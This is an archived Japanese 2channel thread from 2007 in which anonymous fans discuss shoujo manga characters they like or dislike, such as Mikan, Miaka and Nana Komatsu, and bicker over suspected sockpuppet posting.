そもそも学アリってそんなに有名な漫画だっけ?
やっぱり自え(ry

132 :花と名無しさん:2007/01/18(木) 19:19:01 ID:???O
蜜柑が何なのかわからない自分には
果物の蜜柑の話かと思った

133 :花と名無しさん:2007/01/18(木) 19:57:46 ID:???0
何でまた蒸し返すのかね?折角普通の書き込みが見れたのに・・
自演、自演って信者だかアンチだか知らないけど
いい加減ウザイことに気付け。>>122

134 :花と名無しさん:2007/01/18(木) 19:59:52 ID:???0
>>129
自分も棗の方が嫌いだね。性格悪いし。

135 :花と名無しさん:2007/01/18(木) 20:03:55 ID:???0
花ゆめ信者は本当にウザイわ〜

136 :花と名無しさん:2007/01/18(木) 20:18:02 ID:Z3Z8+kVlO
蜜柑大っ嫌い。
アンチがむっちゃくっちゃウザいし、気持ち悪いから。
言っとくけど私蜜柑嫌いだからキモいAA攻撃とかしないでね。

137 :花と名無しさん:2007/01/18(木) 20:56:25 ID:???0
133:01/18(木) 19:57 ???0 [sage]
何でまた蒸し返すのかね?折角普通の書き込みが見れたのに・・
自演、自演って信者だかアンチだか知らないけど
いい加減ウザイことに気付け。>>122

325 :名無しかわいいよ名無し :2007/01/18(木) 19:58:53 ID:laRlSf9z
>>322
しつこいよアンタ。


138 :花と名無しさん:2007/01/18(木) 20:58:30 ID:???O
>117
こそっとイザーク同意。
自分の不幸とか心境語らない姿勢は好感もてる、はずなんだけど…
なんかこう、ちがうんだよね。鬱々するというか…
要するに重い

139 :花と名無しさん:2007/01/18(木) 20:59:18 ID:???0
なんだなんだ
でっち上げのソースを要求されて困り果てた狂アンチが
少女漫画板をキャラ板を行き来して必死で揉み消して
流そうとしているのか?(・∀・)

140 :花と名無しさん:2007/01/18(木) 21:16:11 ID:???O
皆さん、基地外は目を合わせずスルーが大人のマナーですよ

141 :花と名無しさん:2007/01/18(木) 22:03:18 ID:???O
もう蜜柑と美朱は殿堂入りにすればいいんじゃね?

142 :花と名無しさん:2007/01/18(木) 22:06:13 ID:???0
天ないの翠が苦手〜。あの前向きなパワーがうっとおしかった…おでこも。
マミリンは好きだったけど。矢沢あいの漫画の主人公はどうも合わない。


143 :花と名無しさん:2007/01/18(木) 22:35:27 ID:???0
>>137
基地外・・いちいち晒し者にするなよ・・

144 :花と名無しさん:2007/01/18(木) 22:39:48 ID:???0
アリスの狂アンチも狂信者もしつこいよ〜。

145 :花と名無しさん:2007/01/18(木) 22:45:06 ID:???O
>>137
ちょww両方の投稿時刻ww

146 :花と名無しさん:2007/01/18(木) 22:47:08 ID:???0
投稿時刻が近いからって同一とは
限らんだろw

147 :花と名無しさん:2007/01/18(木) 22:49:05 ID:???O
>>143
コテ化してるよ。気を付けて。

148 :花と名無しさん:2007/01/18(木) 22:53:20 ID:???O
>>127
恋愛メインの少女漫画のドリームとかあんの…?(゚Д゚)ポカーン

149 :花と名無しさん:2007/01/18(木) 22:54:31 ID:???0
てかドリームを持ち出す事自体が・・

150 :花と名無しさん:2007/01/18(木) 23:01:46 ID:Z3Z8+kVlO
☆自演祭age☆

151 :花と名無しさん:2007/01/18(木) 23:04:45 ID:???0
自演自演・・馬鹿の一つ覚えですなw

152 :花と名無しさん:2007/01/18(木) 23:11:47 ID:???0
漫画版もあるから書くけど
彩雲国物語の秀麗が好きです。

153 :花と名無しさん:2007/01/19(金) 00:32:43 ID:???0
蜜柑を叩いてる人、同じ人が何回も書き込んでるのか?
似たようなことばかり書いてあるしw

154 :花と名無しさん:2007/01/19(金) 00:56:40 ID:???0
81:01/18(木) 12:14 ???0 [sage]
わざわざ・・調べてくるんだ・・ご苦労な事で・・

85:01/18(木) 12:29 ???0 [sage]
いないかどうかなんてはっきりとは、わかんないだろ?
そんなの?蜜柑を叩かれて抗議する輩もいるし・・
決め付けるのはおかしい。

86:01/18(木) 12:30 ???0 [sage]
いるんじゃないの?信者くらい・・

113:01/18(木) 14:06 ???0 [sage]
確かに、ノリコって好かれているよね。
他の主人公は散々なのに・・みあかとか・・
何が違うんだろう・・

133:01/18(木) 19:57 ???0 [sage]
何でまた蒸し返すのかね?折角普通の書き込みが見れたのに・・
自演、自演って信者だかアンチだか知らないけど
いい加減ウザイことに気付け。>>122

143:01/18(木) 22:35 ???0 [sage]
>>137
基地外・・いちいち晒し者にするなよ・・

149:01/18(木) 22:54 ???0 [sage]
てかドリームを持ち出す事自体が・・



「・・」ばかり使ってる人ってひょっとして同じ人?
同じような意見ばかりだし。

155 :花と名無しさん:2007/01/19(金) 01:01:08 ID:???0
>>154
ほんとだw何て分かりやすいんだww

156 :花と名無しさん:2007/01/19(金) 01:10:21 ID:???0
おいおいバラすなよせっかくニラニラしてたのに!!
今度から「・・」を意地でも使わずに自演を繰り返すに
50000000000000ファンサイト荒らし。

使わなくても文体からバレバレだけどな(´ー`)

157 :花と名無しさん:2007/01/19(金) 01:19:07 ID:???0
いい加減にしろよあんたらも
文体だけで自演扱いか?

158 :花と名無しさん:2007/01/19(金) 01:20:16 ID:???0
蜜柑の悪口かくとこういう仕打ちがくるんだ。
怖い怖いwww

159 :花と名無しさん:2007/01/19(金) 01:22:25 ID:???0
仕返ししてる人も自演くさいけどな
同レベルじゃん!!!!

160 :花と名無しさん:2007/01/19(金) 01:32:05 ID:???0
いつまで続けるのかな?

161 :花と名無しさん:2007/01/19(金) 01:50:10 ID:???O
嫌い〜小松奈々(NANA)
日本人の悪いイメージを外国人読者に与えた罪により処刑希望。低年令読者にも悪影響与えてるし
同じく嫌い〜ホスト部メイン男性キャラ。ナル、二重人格、ショタ、ひねくれたホモとかキモイ。
あとハルヒは努力してる天才なのに庶民と馬鹿にしすぎた糞セレブどもは破産しろ。美形天才セレブが集団はひくわ。
ハルヒも短髪は可愛いが長髪は目のでかさが際立ち可愛いとは思えない。女だとわかりほぼ総マンセーとか昔はモテモテとかウザイ。原作もワンパタ

162 :花と名無しさん:2007/01/19(金) 02:10:09 ID:???O
・・タソの今後の活躍に期待。

163 :花と名無しさん:2007/01/19(金) 02:13:35 ID:???0
イタキスの入江くんが嫌い。
こいつはほんとに何様?って思った。あまりの天才設定に引く。
琴子も入江君入江君ばっかりで鬱陶しい。
イタキス、10巻で終わってりゃまだ面白かったのに。

164 :花と名無しさん:2007/01/19(金) 06:29:48 ID:???0
>>154->>156の書き込みで蜜柑嫌いです。


165 :花と名無しさん:2007/01/19(金) 06:34:52 ID:???0
蜜柑アンチ良かったじゃないか

166 :花と名無しさん:2007/01/19(金) 06:47:16 ID:???0
キャラ好きにしろ、叩きにしろ、今はキャラ板やサロン板があるので
次スレは少女漫画板に不要な希ガス。
このスレの中で、特定の信者とアンチがやりあってると
あぼ〜んするのが面倒で仕方ないよ。

167 :花と名無しさん:2007/01/19(金) 06:52:17 ID:???O
蜜柑アンチが「なつみかんウザイ」って言ってるのよく聞くけど
なつみかんって何?

168 :花と名無しさん:2007/01/19(金) 07:12:20 ID:???0
>>167
個人的推測→棗×蜜柑のカップリング好きの人を総称してるのでは?

169 :花と名無しさん:2007/01/19(金) 07:18:44 ID:???0
>>126
http://tiyu.to/image/news/18_02_14h.jpg
>アホな台詞を吐きながら乳をなめる男と、乳なめられながらやたら幸せそうな女の子の表情がナチュラルに気が狂っていて好きです。

これにワロタw

170 :花と名無しさん:2007/01/19(金) 12:38:18 ID:???0
>>40
>渡瀬悠宇は色んな作品においてキャラを殺すのが本当に上手いと思う。

でも殺しすぎ

171 :花と名無しさん:2007/01/19(金) 14:56:30 ID:???0
>>163
同士よ…!

172 :花と名無しさん:2007/01/19(金) 16:11:13 ID:???0
ちりこはあからさまな死亡フラグたってたよなー。
自分の生い立ち告白とか美朱に惚れてたとか…
↑と幽霊で復活は萎えまくったが、好きなキャラだ。

173 :花と名無しさん:2007/01/19(金) 16:12:05 ID:???O
>>70
のほほん王子様系のアリシア
尻軽コンビの藍華(断髪前)と暁
見た目が蛾みたいな社長がうざくて嫌い。
暁はフラグ立ってるのがアリシアと灯里だけなら許せたが…
あと「はひ!」「すわ!」って口癖が無理あり過ぎて嫌い。

174 :花と名無しさん:2007/01/19(金) 17:40:25 ID:???0
こどちゃの紗南
花より男子の滋
動物のお医者さんの菱沼さん

好き

175 :花と名無しさん:2007/01/19(金) 18:25:57 ID:???O
アリアは掲載雑誌はともかく内容は少女漫画だよね。
たしか作者も少女漫画として扱ってたはずだし。
あかりはわりと好きかも。
恥ずかしい台詞に必ず藍華が突っ込むおかげでウザさ半減。
あんまり泣かないし努力してるし。
藍華は髪燃え騒動以来好きになったし、アリス、三大妖精もそれぞれ好きだ。

ふしぎ遊戯は美朱は巫女なのに恋愛にがっついてるのに多少引いたが
最終巻で唯を生き返らせるのを一番にしただけマシだった。
七星士は皆好きだったな。

176 :花と名無しさん:2007/01/19(金) 18:29:06 ID:???O
>172
ちりこじゃなくてぬりこじゃないの?

177 :花と名無しさん:2007/01/19(金) 18:50:27 ID:???0
タマホメはミアカが絡んでなければ良いヤツっぽい

178 :花と名無しさん:2007/01/19(金) 19:00:36 ID:???0
ふし遊の作者は殺すのはうまいが生かすのは下手だわな

179 :花と名無しさん:2007/01/19(金) 20:39:37 ID:???0
嫌い
美朱 蘭世 琴子
 男のことしか頭にないのもいただけないけど、作中での過剰なマンセーが鼻につく。
特に蘭世は女神扱いされてて意味不明。
最初のコメディ路線のままでいけばよかったのに。


180 :花と名無しさん:2007/01/19(金) 22:15:20 ID:???0
普通に「良い子」としてマンセーされるならともかく、やたらと神格化されて
天使やら女神やら聖母やらのようにマンセーされると痛いなあ。

181 :花と名無しさん:2007/01/20(土) 12:17:45 ID:???0
>>176そうだったごめん。
みつかけの死に方はおざなりな感じしたな。
作者に気に入られていないっぽいキャラだったから、
生きてる時も目立ってなかったんだよね。
泣かせるためだけに死なせるのは勘弁して欲しいな。

182 :花と名無しさん:2007/01/20(土) 12:37:11 ID:???0
みつかけとちりこってどうでもいい的なぞんざいな扱いされてたよな
どっちも美形じゃないし年齢的・性格的に身赤の相手っぽくならないからかな

183 :花と名無しさん:2007/01/20(土) 13:41:24 ID:???O
渡瀬ならふし遊より思春期のアスカとマナトが嫌いだったな〜。
あとこどちゃの羽山は嫌い。

184 :花と名無しさん:2007/01/20(土) 13:50:57 ID:???0
ふし遊は今やってる玄武編の方に好きキャラが多い

185 :花と名無しさん:2007/01/21(日) 16:21:50 ID:HTTN5ymnO
花本はぐみ大嫌い
くそチビ踏み潰したろかって思う

186 :花と名無しさん:2007/01/21(日) 22:20:16 ID:???O
NANAの小松奈々。
ヤリまくった挙げ句妊娠して彼氏を投げ捨てる女には共感できんわ…
そりゃ宮崎も降りるわな。

187 :花と名無しさん:2007/01/22(月) 18:05:41 ID:???0
ハチクロならはぐもあんまり好きじゃないけど、あゆみはもっと嫌だった。
といっても最初の頃のパっと見姉御系でサバサバしてるけど真山に一途だった頃は
好きだった。途中からやたらマンセーされるようになってうんざりした

188 :花と名無しさん:2007/01/22(月) 18:22:13 ID:???0
すっかり平和になりましたね

189 :花と名無しさん:2007/01/22(月) 18:43:37 ID:???0
こんくらいがちょうどいい

190 :花と名無しさん:2007/01/22(月) 20:33:57 ID:???0
好き→ミラクルガールズのみかげ、バラ色の明日のナナ
嫌い→天ないの翠、パラキスの紫

191 :花と名無しさん:2007/01/22(月) 21:07:47 ID:???0
>>186
1年半くらい前に奈々に共感してるヲタ女がテレビで出てた
彼女の言動はリアルで移入しやすいんだと

192 :花と名無しさん:2007/01/23(火) 19:55:50 ID:???0
嫌い
琴子(イタKISS) 紫織(ガラスの仮面)奈々(NANA)
男の事しか頭になくて、他に趣味見つけろよって思う
琴子の「入江君が医者になるなら看護婦になりたい」っていう
セリフにいらいらさせられる。ていうか患者にしてみれば大迷惑

193 :花と名無しさん:2007/01/24(水) 22:48:33 ID:???0
フルバのアキト嫌い
キモイしうざい

194 :花と名無しさん:2007/01/24(水) 23:29:37 ID:???0
フルバの夾が大嫌い。
自分が劣等感を抱えていることもそれ故に誰かに依存してることも分かってるくせに
その自分が依存している相手を逆に見下すなんて一体何様のつもりなんだか。
自分を「被害者=人を傷つけても許される存在」と思ってるのがさらにたちが悪い。
こいつみたいのを「中二病」っていうんだろうな・・・。

195 :花と名無しさん:2007/01/25(木) 01:48:32 ID:???0
・嫌い
 フルバ→後半の夾、透、しぐれ、由希の彼女(キャラ変わりすぎ)
     前半のアキト、リン(ドキュソすぎ)
 ふし遊→美朱(身勝手すぎ)、二部のタカ(お前鬼宿じゃなry)
 ハチクロ→後半のはぐ(訳分からん)
 カレカノ→トラウマうざくなってからの有馬(キモすぎ)
 NANA→タクミフラグ入ってから以降のナナ
 

・好き
 フルバ→前半の透、夾、紅葉
     後半のユキ、最後らへんのアキト、リン
 ふし遊→前半の鬼宿、翼宿、星宿、序盤の唯
     オカマ時代の柳宿、玄武の多喜子、虚宿
 NANA→二人で暮らしてた頃のナナ
 僕らがいた→七美
 ARIA→メイン6人
 のだめ→のだめラブモード入る前の千秋

196 :花と名無しさん:2007/01/25(木) 01:54:45 ID:???O
>>194-195に較べて>>193があまりにも主観的過ぎるのがワロス

197 :花と名無しさん:2007/01/25(木) 02:10:50 ID:???0
どのキャラも主観で挙げられてると思ふ

45 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)